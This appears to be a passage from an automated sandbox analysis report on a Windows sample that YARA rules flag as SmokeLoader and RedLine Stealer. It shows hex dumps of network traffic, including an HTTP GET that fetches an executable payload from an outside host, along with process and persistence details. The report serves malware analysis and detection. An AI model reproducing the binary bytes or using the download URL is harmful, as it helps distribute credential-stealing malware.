                                                                                                                        2024-11-30 10:13:12 UTC8000INData Raw: 53 bf 00 29 42 00 57 e8 56 29 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 d3 05 00 00 83 c4 14 68 04 01 00 00 be 19 29 42 00 56 6a 00 c6 05 1d 2a 42 00 00 ff 15 80 e0 41 00 85 c0 75 26 68 a8 e7 41 00 68 fb 02 00 00 56 e8 14 29 00 00 83 c4 0c 85 c0 74 0f 33 c0 50 50 50 50 50 e8 8f 05 00 00 83 c4 14 56 e8 6d 28 00 00 40 59 83 f8 3c 76 38 56 e8 60 28 00 00 83 ee 3b 03 c6 6a 03 b9 14 2c 42 00 68 a4 e7 41 00 2b c8 51 50 e8 8d 27 00 00 83 c4 14 85 c0 74 11 33 f6 56 56 56 56 56 e8 4c 05 00 00 83 c4 14 eb 02 33 f6 68 a0 e7 41 00 53 57 e8 f3 26 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 28 05 00 00 83 c4 14 8b 45 fc ff 34 c5 ac 12 42 00 53 57 e8 ce 26 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 03 05 00 00 83 c4 14 68 10 20 01 00 68 78 e7 41 00 57 e8 41 25 00
                                                                                                                        Data Ascii: S)BWV)tVVVVVh)BVj*BAu&hAhV)t3PPPPPVm(@Y<v8V`(;j,BhA+QP't3VVVVVL3hASW&tVVVVV(E4BSW&tVVVVVh hxAWA%
                                                                                                                        2024-11-30 10:13:12 UTC8000INData Raw: 1e 74 0a 40 38 18 75 fb 40 38 18 75 f6 2b c6 40 50 89 45 f8 e8 cc 00 00 00 8b f8 59 3b fb 75 0c 56 ff 15 28 e1 41 00 e9 45 ff ff ff ff 75 f8 56 57 e8 b1 ea ff ff 83 c4 0c 56 ff 15 28 e1 41 00 8b c7 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 10 a1 08 10 42 00 83 65 f8 00 83 65 fc 00 53 57 bf 4e e6 40 bb bb 00 00 ff ff 3b c7 74 0d 85 c3 74 09 f7 d0 a3 0c 10 42 00 eb 60 56 8d 45 f8 50 ff 15 44 e1 41 00 8b 75 fc 33 75 f8 ff 15 40 e1 41 00 33 f0 ff 15 1c e1 41 00 33 f0 ff 15 3c e1 41 00 33 f0 8d 45 f0 50 ff 15 38 e1 41 00 8b 45 f4 33 45 f0 33 f0 3b f7 75 07 be 4f e6 40 bb eb 0b 85 f3 75 07 8b c6 c1 e0 10 0b f0 89 35 08 10 42 00 f7 d6 89 35 0c 10 42 00 5e 5f 5b c9 c3 83 25 e0 89 80 00 00 c3 8b ff 55 8b ec 56 57 33 f6 ff 75 08 e8 3d c6 ff ff 8b f8 59 85 ff 75 27 39 05
                                                                                                                        Data Ascii: t@8u@8u+@PEY;uV(AEuVWV(A_^[UBeeSWN@;ttB`VEPDAu3u@A3A3<A3EP8AE3E3;uO@u5B5B^_[%UVW3u=Yu'9
                                                                                                                        2024-11-30 10:13:12 UTC8000INData Raw: 3b f7 75 1c e8 16 b1 ff ff 57 57 57 57 57 c7 00 16 00 00 00 e8 7f c8 ff ff 83 c4 14 0b c3 eb 42 f6 46 0c 83 74 37 56 e8 08 ec ff ff 56 8b d8 e8 48 17 00 00 56 e8 f5 c6 ff ff 50 e8 6f 16 00 00 83 c4 10 85 c0 7d 05 83 cb ff eb 11 8b 46 1c 3b c7 74 0a 50 e8 7d a6 ff ff 59 89 7e 1c 89 7e 0c 8b c3 5f 5e 5b 5d c3 6a 0c 68 30 f7 41 00 e8 98 bd ff ff 83 4d e4 ff 33 c0 8b 75 08 33 ff 3b f7 0f 95 c0 3b c7 75 1d e8 93 b0 ff ff c7 00 16 00 00 00 57 57 57 57 57 e8 fc c7 ff ff 83 c4 14 83 c8 ff eb 0c f6 46 0c 40 74 0c 89 7e 0c 8b 45 e4 e8 9b bd ff ff c3 56 e8 41 c3 ff ff 59 89 7d fc 56 e8 2a ff ff ff 59 89 45 e4 c7 45 fc fe ff ff ff e8 05 00 00 00 eb d5 8b 75 08 56 e8 8f c3 ff ff 59 c3 8b ff 55 8b ec b8 e4 1a 00 00 e8 15 19 00 00 a1 08 10 42 00 33 c5 89 45 fc 8b 45 0c
                                                                                                                        Data Ascii: ;uWWWWWBFt7VVHVPo}F;tP}Y~~_^[]jh0AM3u3;;uWWWWWF@t~EVAY}V*YEEuVYUB3EE
                                                                                                                        2024-11-30 10:13:12 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        2024-11-30 10:13:13 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        2024-11-30 10:13:13 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        2024-11-30 10:13:13 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        2024-11-30 10:13:13 UTC8000INData Raw: a9 25 b0 46 e5 15 07 55 5e da 78 55 15 e9 1c 5b 8e 65 2d 7f db fe 6d 8b b2 23 af a8 e1 51 6c 7f 80 3e 61 68 2b 37 da 62 ca d5 29 73 f2 b2 f7 de bf ed 89 15 6e 82 09 e7 82 bc 93 c2 86 53 71 75 3b 20 47 10 22 a2 bd 6b 73 82 ae 49 10 be 73 78 3e 19 8c e6 7f b9 1e 14 76 09 d1 c2 1b bd ff c9 7e 04 a4 a7 fe d7 8b 41 97 98 1e b9 ac fb 26 70 b1 3d 08 16 d5 1e 26 c5 cc 3b 53 8c 6d 23 83 8a 11 2a 68 5b c3 d6 e6 97 64 30 0f 9e 50 7c 3d b3 8c b4 ab 98 ed fa 1a d8 95 99 9f 96 33 ce c7 b2 cc 37 9e e8 da 40 e9 3a a2 36 f3 d6 34 e7 0c 33 7b cf 3e e1 d3 65 51 46 b9 7c 5f e3 b5 50 64 41 f8 5a e0 6d 43 4e 9c b7 28 1b a5 21 f1 b8 98 18 9b c4 a2 43 02 ba 70 92 fe 43 95 18 8a b1 81 7e 35 64 ce 60 78 72 db 99 2c 82 43 4a 22 74 ab 0a e2 98 02 65 18 ce be a9 35 64 7e 00 a1 d8 9e
                                                                                                                        Data Ascii: %FU^xU[e-m#Ql>ah+7b)snSqu; G"ksIsx>v~A&p=&;Sm#*h[d0P|=37@:643{>eQF|_PdAZmCN(!CpC~5d`xr,CJ"te5d~
                                                                                                                        2024-11-30 10:13:13 UTC8000INData Raw: cc 5c 01 e4 80 68 79 90 36 43 1c 30 74 66 52 18 ef be e6 83 88 79 88 c9 13 34 46 fa 53 b8 ea 61 0d 24 33 3f de 21 18 40 7b b5 37 5b dd 25 af d4 4c 89 d5 01 2c e2 77 14 62 47 c0 2f 87 df 0e 48 d9 1a 64 5c 1a 9b 3a c5 05 ea e9 5e c4 58 50 6b 53 db 08 02 4b 1e d3 5f fc cc 26 33 81 e7 6b fc d1 0b cb 08 a7 1e 10 e1 f2 a7 9d ac 24 77 95 e4 45 dd e8 39 5c 88 34 36 5b 72 f8 b5 05 6b e9 bd 4e 83 14 4b 17 d8 38 af 7b 77 4e 0d a5 3c 05 e8 14 c7 1c b1 77 2d 13 6e 18 4e fc cf af 74 d8 dc 52 54 ee 78 d1 38 3d f8 60 3b ec 58 79 7c 3f a9 87 ee f7 67 f6 ef 15 11 29 6c ec 57 ba de a6 77 5f c5 53 75 be 21 6a fc d9 68 25 1f 78 0a a9 a1 49 06 5e 2d 74 c2 41 c2 49 62 78 20 44 e0 0e 6e 9b 3c cc ef a4 ac 19 a5 51 ec ec 29 7e a1 42 7f 80 3c a5 97 e5 57 14 61 5f 7a b0 56 97 80 62
                                                                                                                        Data Ascii: \hy6C0tfRy4FSa$3?!@{7[%L,wbG/Hd\:^XPkSK_&3k$wE9\46[rkNK8{wN<w-nNtRTx8=`;Xy|?g)lWw_Su!jh%xI^-tAIbx Dn<Q)~B<Wa_zVb


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.44987523.145.40.1814432580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-30 10:13:44 UTC167OUTGET /prog/ctlg.exe HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Host: midginvineco.com
                                                                                                                        2024-11-30 10:13:44 UTC327INHTTP/1.1 200 OK
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:44 GMT
                                                                                                                        Server: Apache/2.4.52 (Ubuntu)
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Last-Modified: Sat, 30 Nov 2024 10:00:02 GMT
                                                                                                                        ETag: "2fe00-6281e610d494f"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 196096
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                        2024-11-30 10:13:44 UTC7865INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 a5 8c 4e 52 c4 e2 1d 52 c4 e2 1d 52 c4 e2 1d 4c 96 66 1d 49 c4 e2 1d 4c 96 77 1d 43 c4 e2 1d 4c 96 61 1d 0f c4 e2 1d 75 02 99 1d 55 c4 e2 1d 52 c4 e3 1d 2b c4 e2 1d 4c 96 68 1d 53 c4 e2 1d 4c 96 76 1d 53 c4 e2 1d 4c 96 73 1d 53 c4 e2 1d 52 69 63 68 52 c4 e2 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 85 88 53 66 00 00 00 00 00 00 00 00 e0 00 03
                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NRRRLfILwCLauUR+LhSLvSLsSRichRPELSf
                                                                                                                        2024-11-30 10:13:45 UTC8000INData Raw: 53 bf 00 29 42 00 57 e8 56 29 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 d3 05 00 00 83 c4 14 68 04 01 00 00 be 19 29 42 00 56 6a 00 c6 05 1d 2a 42 00 00 ff 15 80 e0 41 00 85 c0 75 26 68 a8 e7 41 00 68 fb 02 00 00 56 e8 14 29 00 00 83 c4 0c 85 c0 74 0f 33 c0 50 50 50 50 50 e8 8f 05 00 00 83 c4 14 56 e8 6d 28 00 00 40 59 83 f8 3c 76 38 56 e8 60 28 00 00 83 ee 3b 03 c6 6a 03 b9 14 2c 42 00 68 a4 e7 41 00 2b c8 51 50 e8 8d 27 00 00 83 c4 14 85 c0 74 11 33 f6 56 56 56 56 56 e8 4c 05 00 00 83 c4 14 eb 02 33 f6 68 a0 e7 41 00 53 57 e8 f3 26 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 28 05 00 00 83 c4 14 8b 45 fc ff 34 c5 ac 12 42 00 53 57 e8 ce 26 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 03 05 00 00 83 c4 14 68 10 20 01 00 68 78 e7 41 00 57 e8 41 25 00
                                                                                                                        Data Ascii: S)BWV)tVVVVVh)BVj*BAu&hAhV)t3PPPPPVm(@Y<v8V`(;j,BhA+QP't3VVVVVL3hASW&tVVVVV(E4BSW&tVVVVVh hxAWA%
                                                                                                                        2024-11-30 10:13:45 UTC8000INData Raw: 1e 74 0a 40 38 18 75 fb 40 38 18 75 f6 2b c6 40 50 89 45 f8 e8 cc 00 00 00 8b f8 59 3b fb 75 0c 56 ff 15 28 e1 41 00 e9 45 ff ff ff ff 75 f8 56 57 e8 b1 ea ff ff 83 c4 0c 56 ff 15 28 e1 41 00 8b c7 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 10 a1 08 10 42 00 83 65 f8 00 83 65 fc 00 53 57 bf 4e e6 40 bb bb 00 00 ff ff 3b c7 74 0d 85 c3 74 09 f7 d0 a3 0c 10 42 00 eb 60 56 8d 45 f8 50 ff 15 44 e1 41 00 8b 75 fc 33 75 f8 ff 15 40 e1 41 00 33 f0 ff 15 1c e1 41 00 33 f0 ff 15 3c e1 41 00 33 f0 8d 45 f0 50 ff 15 38 e1 41 00 8b 45 f4 33 45 f0 33 f0 3b f7 75 07 be 4f e6 40 bb eb 0b 85 f3 75 07 8b c6 c1 e0 10 0b f0 89 35 08 10 42 00 f7 d6 89 35 0c 10 42 00 5e 5f 5b c9 c3 83 25 e0 89 80 00 00 c3 8b ff 55 8b ec 56 57 33 f6 ff 75 08 e8 3d c6 ff ff 8b f8 59 85 ff 75 27 39 05
                                                                                                                        Data Ascii: t@8u@8u+@PEY;uV(AEuVWV(A_^[UBeeSWN@;ttB`VEPDAu3u@A3A3<A3EP8AE3E3;uO@u5B5B^_[%UVW3u=Yu'9
                                                                                                                        2024-11-30 10:13:45 UTC8000INData Raw: 3b f7 75 1c e8 16 b1 ff ff 57 57 57 57 57 c7 00 16 00 00 00 e8 7f c8 ff ff 83 c4 14 0b c3 eb 42 f6 46 0c 83 74 37 56 e8 08 ec ff ff 56 8b d8 e8 48 17 00 00 56 e8 f5 c6 ff ff 50 e8 6f 16 00 00 83 c4 10 85 c0 7d 05 83 cb ff eb 11 8b 46 1c 3b c7 74 0a 50 e8 7d a6 ff ff 59 89 7e 1c 89 7e 0c 8b c3 5f 5e 5b 5d c3 6a 0c 68 30 f7 41 00 e8 98 bd ff ff 83 4d e4 ff 33 c0 8b 75 08 33 ff 3b f7 0f 95 c0 3b c7 75 1d e8 93 b0 ff ff c7 00 16 00 00 00 57 57 57 57 57 e8 fc c7 ff ff 83 c4 14 83 c8 ff eb 0c f6 46 0c 40 74 0c 89 7e 0c 8b 45 e4 e8 9b bd ff ff c3 56 e8 41 c3 ff ff 59 89 7d fc 56 e8 2a ff ff ff 59 89 45 e4 c7 45 fc fe ff ff ff e8 05 00 00 00 eb d5 8b 75 08 56 e8 8f c3 ff ff 59 c3 8b ff 55 8b ec b8 e4 1a 00 00 e8 15 19 00 00 a1 08 10 42 00 33 c5 89 45 fc 8b 45 0c
                                                                                                                        Data Ascii: ;uWWWWWBFt7VVHVPo}F;tP}Y~~_^[]jh0AM3u3;;uWWWWWF@t~EVAY}V*YEEuVYUB3EE
                                                                                                                        2024-11-30 10:13:45 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        2024-11-30 10:13:45 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        2024-11-30 10:13:45 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        2024-11-30 10:13:45 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        2024-11-30 10:13:45 UTC8000INData Raw: a9 25 b0 46 e5 15 07 55 5e da 78 55 15 e9 1c 5b 8e 65 2d 7f db fe 6d 8b b2 23 af a8 e1 51 6c 7f 80 3e 61 68 2b 37 da 62 ca d5 29 73 f2 b2 f7 de bf ed 89 15 6e 82 09 e7 82 bc 93 c2 86 53 71 75 3b 20 47 10 22 a2 bd 6b 73 82 ae 49 10 be 73 78 3e 19 8c e6 7f b9 1e 14 76 09 d1 c2 1b bd ff c9 7e 04 a4 a7 fe d7 8b 41 97 98 1e b9 ac fb 26 70 b1 3d 08 16 d5 1e 26 c5 cc 3b 53 8c 6d 23 83 8a 11 2a 68 5b c3 d6 e6 97 64 30 0f 9e 50 7c 3d b3 8c b4 ab 98 ed fa 1a d8 95 99 9f 96 33 ce c7 b2 cc 37 9e e8 da 40 e9 3a a2 36 f3 d6 34 e7 0c 33 7b cf 3e e1 d3 65 51 46 b9 7c 5f e3 b5 50 64 41 f8 5a e0 6d 43 4e 9c b7 28 1b a5 21 f1 b8 98 18 9b c4 a2 43 02 ba 70 92 fe 43 95 18 8a b1 81 7e 35 64 ce 60 78 72 db 99 2c 82 43 4a 22 74 ab 0a e2 98 02 65 18 ce be a9 35 64 7e 00 a1 d8 9e
                                                                                                                        Data Ascii: %FU^xU[e-m#Ql>ah+7b)snSqu; G"ksIsx>v~A&p=&;Sm#*h[d0P|=37@:643{>eQF|_PdAZmCN(!CpC~5d`xr,CJ"te5d~
                                                                                                                        2024-11-30 10:13:45 UTC8000INData Raw: cc 5c 01 e4 80 68 79 90 36 43 1c 30 74 66 52 18 ef be e6 83 88 79 88 c9 13 34 46 fa 53 b8 ea 61 0d 24 33 3f de 21 18 40 7b b5 37 5b dd 25 af d4 4c 89 d5 01 2c e2 77 14 62 47 c0 2f 87 df 0e 48 d9 1a 64 5c 1a 9b 3a c5 05 ea e9 5e c4 58 50 6b 53 db 08 02 4b 1e d3 5f fc cc 26 33 81 e7 6b fc d1 0b cb 08 a7 1e 10 e1 f2 a7 9d ac 24 77 95 e4 45 dd e8 39 5c 88 34 36 5b 72 f8 b5 05 6b e9 bd 4e 83 14 4b 17 d8 38 af 7b 77 4e 0d a5 3c 05 e8 14 c7 1c b1 77 2d 13 6e 18 4e fc cf af 74 d8 dc 52 54 ee 78 d1 38 3d f8 60 3b ec 58 79 7c 3f a9 87 ee f7 67 f6 ef 15 11 29 6c ec 57 ba de a6 77 5f c5 53 75 be 21 6a fc d9 68 25 1f 78 0a a9 a1 49 06 5e 2d 74 c2 41 c2 49 62 78 20 44 e0 0e 6e 9b 3c cc ef a4 ac 19 a5 51 ec ec 29 7e a1 42 7f 80 3c a5 97 e5 57 14 61 5f 7a b0 56 97 80 62
                                                                                                                        Data Ascii: \hy6C0tfRy4FSa$3?!@{7[%L,wbG/Hd\:^XPkSK_&3k$wE9\46[rkNK8{wN<w-nNtRTx8=`;Xy|?g)lWw_Su!jh%xI^-tAIbx Dn<Q)~B<Wa_zVb


                                                                                                                        Click to jump to process

                                                                                                                        Click to jump to process

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Click to jump to process

                                                                                                                        Target ID:0
                                                                                                                        Start time:05:11:53
                                                                                                                        Start date:30/11/2024
                                                                                                                        Path:C:\Users\user\Desktop\3WaqgS34S7.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\3WaqgS34S7.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:193'536 bytes
                                                                                                                        MD5 hash:F99E6584C274E6814B81BE68C0F2EE47
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1741605367.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1741413707.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1741413707.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1741803649.0000000002471000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1741803649.0000000002471000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1741369636.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Target ID:1
                                                                                                                        Start time:05:12:00
                                                                                                                        Start date:30/11/2024
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                        Imagebase:0x7ff72b770000
                                                                                                                        File size:5'141'208 bytes
                                                                                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:false

                                                                                                                        Target ID:5
                                                                                                                        Start time:05:12:19
                                                                                                                        Start date:30/11/2024
                                                                                                                        Path:C:\Users\user\AppData\Roaming\vdhivcv
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\vdhivcv
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:193'536 bytes
                                                                                                                        MD5 hash:F99E6584C274E6814B81BE68C0F2EE47
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1983365123.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1983365123.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
